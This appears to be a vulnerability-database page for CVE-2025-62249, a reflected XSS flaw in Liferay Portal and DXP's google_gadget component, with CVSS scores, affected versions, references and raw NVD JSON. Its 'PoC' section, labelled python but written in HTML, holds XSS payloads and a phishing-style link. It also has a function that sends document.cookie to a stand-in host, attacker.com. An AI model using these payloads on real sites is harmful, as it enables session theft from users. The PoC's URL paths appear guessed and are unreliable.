CVE-2025-62249

Description

A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q3.0 through 2025.Q3.2, 2025.Q2.0 through 2025.Q2.12, 2025.Q1.0 through 2025.Q1.17, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.20, and 2023.Q4.0 through 2023.Q4.10 allows an remote non-authenticated attacker to inject JavaScript into the google_gadget.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.4.0 - 7.4.3.132

Liferay DXP 2025.Q3.0 - 2025.Q3.2

Liferay DXP 2025.Q2.0 - 2025.Q2.12

Liferay DXP 2025.Q1.0 - 2025.Q1.17

Liferay DXP 2024.Q4.0 - 2024.Q4.7

Liferay DXP 2024.Q3.1 - 2024.Q3.13

Liferay DXP 2024.Q2.0 - 2024.Q2.13

Liferay DXP 2024.Q1.1 - 2024.Q1.20

Liferay DXP 2023.Q4.0 - 2023.Q4.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Reflected XSS PoC for CVE-2025-62249 in Liferay Portal google_gadget -->
<!-- The vulnerability exists in the google_gadget component which fails to sanitize user input -->

<!-- Example malicious URL structure: -->
<!-- https://target-liferay.com/google_gadget/...?param=<script>alert(document.cookie)</script> -->

<!-- HTML PoC demonstrating the attack: -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-62249 - Liferay google_gadget XSS PoC</title>
</head>
<body>
    <h1>CVE-2025-62249 Reflected XSS PoC</h1>
    <p>Click the link below to trigger the reflected XSS vulnerability:</p>
    <!-- The malicious payload is injected via the google_gadget parameter -->
    <a href="https://target-liferay.com/web/google_gadget/view?url=javascript:alert('XSS-'+document.cookie)">
        Click here for a free gift!
    </a>
    <br><br>
    <!-- Alternative payload using img onerror -->
    <a href="https://target-liferay.com/web/google_gadget/view?url="><img src=x onerror=alert('XSS-CVE-2025-62249')></a>
    <script>
        // Automated exploitation example
        // The attacker can craft a URL that steals cookies and sends them to an attacker-controlled server
        function exploitXSS() {
            var payload = "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>";
            var maliciousURL = "https://target-liferay.com/web/google_gadget/view?url=" + encodeURIComponent(payload);
            window.location = maliciousURL;
        }
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62249
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62249
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62249/
[4] VulDB https://vuldb.com/cve/CVE-2025-62249
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62249

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62249", "sourceIdentifier": "[email protected]", "published": "2025-10-21T19:21:25.203", "lastModified": "2025-12-12T20:39:34.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q3.0 through 2025.Q3.2, 2025.Q2.0 through 2025.Q2.12, 2025.Q1.0 through 2025.Q1.17, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.20, and 2023.Q4.0 through 2023.Q4.10 allows an remote non-authenticated attacker to inject JavaScript into the google_gadget."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndIncluding": "2023.q4.10", "matchCriteriaId": "99FC3415-FBE2-43BC-944A-72C0885453D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.q1.1", "versionEndExcluding": "2024.q1.21", "matchCriteriaId": "190F5BD3-C5F4-4A47-8215-A260856E96D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.q2.0", "versionEndIncluding": "2024.q2.13", "matchCriteriaId": "0EB4ABE4-0B4D-471C-A868-0CA6F5EE7A47"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.q3.1", "versionEndIncluding": "2024.q3.13", "matchCriteriaId": "81DE8039-B5BF-4747-A426-DCA1FFC8D960"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.q1.0", "versionEndExcluding": "2025.q1.18", "matchCriteriaId": "0592041A-EB51-446F-8905-B9AAD794520F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.q2.0", "versionEndIncluding": "2025.q2.12", "matchCriteriaId": "9BB4E4B5-44B0-44E2-BADE-B1D018BACD8D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.q3.0", "versionEndExcluding": "2025.q3.3", "matchCriteriaId": "5AD23D39-F9E5-4431-910D-9B1D870D02D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.3.132", "matchCriteriaId": "3A3A553B-3544-4943-8898-1DA9AA55E7A3"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62249", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}